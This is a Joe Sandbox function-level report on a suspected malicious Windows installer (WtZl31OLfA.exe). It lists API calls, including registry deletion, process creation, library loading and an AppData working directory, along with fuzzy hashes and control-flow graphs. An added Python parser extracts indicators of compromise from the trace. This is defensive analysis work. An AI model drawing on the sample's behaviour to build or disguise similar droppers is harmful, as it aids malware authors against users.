                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
                                                                                • nsa, xrefs: 00405C61
                                                                                • "C:\Users\user\Desktop\WtZl31OLfA.exe", xrefs: 00405C54
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CountFileNameTempTick
                                                                                • String ID: "C:\Users\user\Desktop\WtZl31OLfA.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                • API String ID: 1716503409-3421336162
                                                                                • Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                • Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
                                                                                • Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
                                                                                • Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64

                                                                                 Control-flow Graph (legend: Executed / Not Executed)
                                                                                 control_flow_graph 716 402bff-402c28 RegOpenKeyExW 717 402c93-402c97 716->717 718 402c2a-402c35 716->718 719 402c50-402c60 RegEnumKeyW 718->719 720 402c62-402c74 RegCloseKey call 40642a 719->720 721 402c37-402c3a 719->721 729 402c76-402c85 720->729 730 402c9a-402ca0 720->730 722 402c87-402c8a RegCloseKey 721->722 723 402c3c-402c4e call 402bff 721->723 725 402c90-402c92 722->725 723->719 723->720 725->717 729->717 730->725 731 402ca2-402cb0 RegDeleteKeyW 730->731 731->725 733 402cb2 731->733 733->717
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: Close$DeleteEnumOpen
                                                                                • String ID:
                                                                                • API String ID: 1912718029-0
                                                                                • Opcode ID: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                                                • Instruction ID: a55e164afb4a2c5db24f06852be026e23ac61ce6859740a963365f2f7f7eec81
                                                                                • Opcode Fuzzy Hash: 63d61aba69846c39a340c92fc89b84eecc01f6a36edae5aa348db2d0b7e3277e
                                                                                • Instruction Fuzzy Hash: 2F116771904119FFEF11AF90DF8CEAE3B79FB54388B10003AF905E10A0D7B49E55AA28

                                                                                 Control-flow Graph (legend: Executed / Not Executed)
                                                                                 control_flow_graph 734 401bdf-401bf7 call 402ba2 * 2 739 401c03-401c07 734->739 740 401bf9-401c00 call 402bbf 734->740 741 401c13-401c19 739->741 742 401c09-401c10 call 402bbf 739->742 740->739 745 401c1b-401c2f call 402ba2 * 2 741->745 746 401c5f-401c89 call 402bbf * 2 FindWindowExW 741->746 742->741 758 401c31-401c4d SendMessageTimeoutW 745->758 759 401c4f-401c5d SendMessageW 745->759 757 401c8f 746->757 760 401c92-401c95 757->760 758->760 759->757 761 401c9b 760->761 762 402a4c-402a5b 760->762 761->762
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Timeout
                                                                                • String ID: !
                                                                                • API String ID: 1777923405-2657877971
                                                                                • Opcode ID: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                • Instruction ID: 7183083e97b306686418f33f328e020de39305092e82b8c4ae23370839422ec4
                                                                                • Opcode Fuzzy Hash: d1ce46bd28cc36f50990ff65351f506775fb0047ee6065fba40e47d3ae025a49
                                                                                • Instruction Fuzzy Hash: 48219071940209BEEF01AFB5CE4AABE7B75EB44744F10403EF601B61D1D6B89A40DB68
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                  • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,759223A0), ref: 0040520A
                                                                                  • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                • String ID: `OC
                                                                                • API String ID: 334405425-799166930
                                                                                • Opcode ID: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                • Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
                                                                                • Opcode Fuzzy Hash: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
                                                                                • Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F47
                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F68
                                                                                • RegCloseKey.KERNELBASE(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F8B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: : Completed
                                                                                • API String ID: 3677997916-2954849223
                                                                                • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                • Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
                                                                                • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                • Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
                                                                                APIs
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,Completed,00000000,0041C400,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                  • Part of subcall function 004051AF: lstrcatW.KERNEL32(Completed,0040318B,0040318B,Completed,00000000,0041C400,759223A0), ref: 0040520A
                                                                                  • Part of subcall function 004051AF: SetWindowTextW.USER32(Completed,Completed), ref: 0040521C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                  • Part of subcall function 00405730: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                  • Part of subcall function 00405730: CloseHandle.KERNEL32(?), ref: 00405766
                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                • String ID:
                                                                                • API String ID: 3585118688-0
                                                                                • Opcode ID: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
                                                                                • Instruction ID: 5d6a9cd2629b2ba724fb53646afbed83d489e6abcf8a7a9a4f308d22f643bc11
                                                                                • Opcode Fuzzy Hash: aa8d34e9d958b61ac726264285b253e089a99d71bbe58b8fb4894c500a0ba68d
                                                                                • Instruction Fuzzy Hash: 2011AD31900508EBDF21AFA1CD849DE7AB6EF40354F21403BF605B61E1C7798A82DB9E
                                                                                APIs
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,75923420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
                                                                                  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                  • Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\neoimpressionism\Vekselformular,?,00000000,000000F0), ref: 00401645
                                                                                Strings
                                                                                • C:\Users\user\AppData\Local\neoimpressionism\Vekselformular, xrefs: 00401638
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                • String ID: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular
                                                                                • API String ID: 1892508949-1797713023
                                                                                • Opcode ID: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                • Instruction ID: 8daf2e24a3ccb3758762820fdf3c9d17d57560494370e9091b2596199d157b81
                                                                                • Opcode Fuzzy Hash: fb737cf84381500ffe7b7272fa4cfc8a78306edaf174f15e8c7f369ee6fb2f62
                                                                                • Instruction Fuzzy Hash: 45119331504504ABCF207FA4CD41A9F36A1EF44368B25093BEA46B61F1DA3D4A81DE5D
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
                                                                                • CloseHandle.KERNEL32(?), ref: 00405766
                                                                                Strings
                                                                                • Error launching installer, xrefs: 00405743
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateHandleProcess
                                                                                • String ID: Error launching installer
                                                                                • API String ID: 3712363035-66219284
                                                                                • Opcode ID: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                • Instruction ID: 828b4cc1025806f2bb1dde6e09e5b56a6c7607ab0cffe69e3a18accb3258c2b6
                                                                                • Opcode Fuzzy Hash: 4fc88ca41c3c45648a755c19479fc4b71f2ef519cf2e9afda518322c17047a2d
                                                                                • Instruction Fuzzy Hash: 9CE092B4600209BFEB10AB64AE49F7BBBACEB04704F004565BA51F2190D774E8148A6C
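The API lines in these function entries are a compact IOC source: the working directory the stub creates and switches into, the registry key it reads, the placeholder "?" slots the plugin could not resolve, and the argument slots of CreateProcessW (whose dwCreationFlags tells you whether a given launch is the suspended-mode one the detection summary flags, or an ordinary child launch; "Error launching installer" is the error string of an NSIS-style installer stub). Below is an added example, not part of the Joe Sandbox report or its IDA plugin, of a small parser for this line format that extracts paths, registry keys and literal strings and decodes the creation flags of each CreateProcessW call. The sample lines are copied from the entries on this page; the regex, the token classification heuristics, the plain comma split (the strings on this page contain no commas) and the flag table are this example's own assumptions.

```python
"""Parse Joe Sandbox 'APIs' lines from a function-level report and pull out
the strings, paths, registry keys and process-creation flags they carry."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: API lines copied from the function entries on this page.
# A real run would feed the whole exported report instead.
SAMPLE_LINES = r"""
• RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405F47
  • Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\neoimpressionism\Vekselformular,?,00000000,000000F0), ref: 00401645
• CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 00405759
  • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
""".strip("\n").splitlines()

# Line shape (assumed from the entries above): optional subcall prefix,
# API.MODULE, optional parenthesised argument slots, then "ref: <call site>".
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX32_RE = re.compile(r"^[0-9A-F]{8}$")
DRIVE_PATH_RE = re.compile(r"^[A-Za-z]:\\")

# dwCreationFlags bits (winbase.h) worth checking in a sandbox trace.
CREATION_FLAGS = {
    0x00000004: "CREATE_SUSPENDED",
    0x00000008: "DETACHED_PROCESS",
    0x00000010: "CREATE_NEW_CONSOLE",
    0x04000000: "CREATE_DEFAULT_ERROR_MODE",
    0x08000000: "CREATE_NO_WINDOW",
}


@dataclass
class ApiCall:
    api: str
    module: str
    ref: str                # address of the call site in the dump
    caller: Optional[str]   # set for "Part of subcall function" entries
    args: list = field(default_factory=list)

    def creation_flags(self):
        """Decode dwCreationFlags (6th slot) of a CreateProcessW/A call."""
        if self.api not in ("CreateProcessW", "CreateProcessA") or len(self.args) < 6:
            return None
        raw = self.args[5]
        if not HEX32_RE.match(raw):
            return None     # '?' means the plugin could not resolve the slot
        value = int(raw, 16)
        return [name for bit, name in sorted(CREATION_FLAGS.items()) if value & bit]


def parse_line(line: str) -> Optional[ApiCall]:
    m = LINE_RE.match(line)
    if not m:
        return None
    raw_args = m.group("args")
    # Plain comma split: adequate for the strings on this page, which contain
    # no commas; an embedded comma would need a smarter tokenizer.
    args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
    return ApiCall(m.group("api"), m.group("module"), m.group("ref"), m.group("caller"), args)


def classify(token: str) -> str:
    if token == "?":
        return "unresolved"
    if HEX32_RE.match(token):
        return "hex"
    if DRIVE_PATH_RE.match(token):
        return "path"
    if token.lower().startswith(("software\\", "system\\")):
        return "regkey"
    return "string"


def extract_iocs(lines):
    """Return (parsed calls, dict of de-duplicated paths/regkeys/strings/flags)."""
    found = {"paths": [], "regkeys": [], "strings": [], "create_process": []}
    calls = [c for c in map(parse_line, lines) if c is not None]
    for call in calls:
        for tok in call.args:
            kind = classify(tok)
            bucket = {"path": "paths", "regkey": "regkeys", "string": "strings"}.get(kind)
            if bucket and tok not in found[bucket]:
                found[bucket].append(tok)
        flags = call.creation_flags()
        if flags is not None:
            found["create_process"].append({"ref": call.ref, "flags": flags})
    return calls, found


if __name__ == "__main__":
    calls, iocs = extract_iocs(SAMPLE_LINES)
    for c in calls:
        print(f"{c.ref} {c.api}.{c.module} caller={c.caller} slots={len(c.args)}")
    for key, value in iocs.items():
        print(key, value)
```

On the lines above the call at 00405759 decodes to CREATE_DEFAULT_ERROR_MODE only, so this CreateProcessW is the installer stub's ordinary child launch; the suspended-mode creation used for injection has to be looked for in other entries, where the slot will carry the 0x4 bit.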
                                                                                APIs
                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID:
                                                                                • API String ID: 3850602802-0
                                                                                • Opcode ID: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                • Instruction ID: 4c9169076b200d8212b617fce9ca5c7b60089ed15e840feb20b98911f3c40294
                                                                                • Opcode Fuzzy Hash: a9c322e8ee35951debce6987b64f542c18e5cc288577b89febbfcef92abd9e98
                                                                                • Instruction Fuzzy Hash: 7E0128316242209FE7095B389D05B6A3698F710715F10853FF851F76F1D678CC428B4C
                                                                                APIs
                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteOpenValue
                                                                                • String ID:
                                                                                • API String ID: 849931509-0
                                                                                • Opcode ID: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
                                                                                • Instruction ID: dc3b8117463452c80c1b03acd1c3af06063939c29d4ce1854e6773ee9d898553
                                                                                • Opcode Fuzzy Hash: e4951519ccd22a2077aa44c75a58b7eb13c9408486021bd269d8e31dadb86734
                                                                                • Instruction Fuzzy Hash: AEF04F32A04110ABEB11BFB59B4EABE72699B80314F15803FF501B71D5D9FC99019629
                                                                                APIs
                                                                                • OleInitialize.OLE32(00000000), ref: 00405292
                                                                                  • Part of subcall function 00404160: SendMessageW.USER32(00010458,00000000,00000000,00000000), ref: 00404172
                                                                                • CoUninitialize.COMBASE(00000404,00000000), ref: 004052DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000436000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.0000000000439000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084593515.000000000044F000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_WtZl31OLfA.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeMessageSendUninitialize

APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
• GetProcAddress.KERNEL32(00000000,?), ref: 00406457
  • Part of subcall function 004063BA: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
  • Part of subcall function 004063BA: wsprintfW.USER32 ref: 0040640C
  • Part of subcall function 004063BA: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406420
Memory Dump Source
• Source File: 00000000.00000002.2084547797.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2084509529.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084576048.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2084593515.0000000000431000.00000004.00000001.01000000.00000003.sdmp
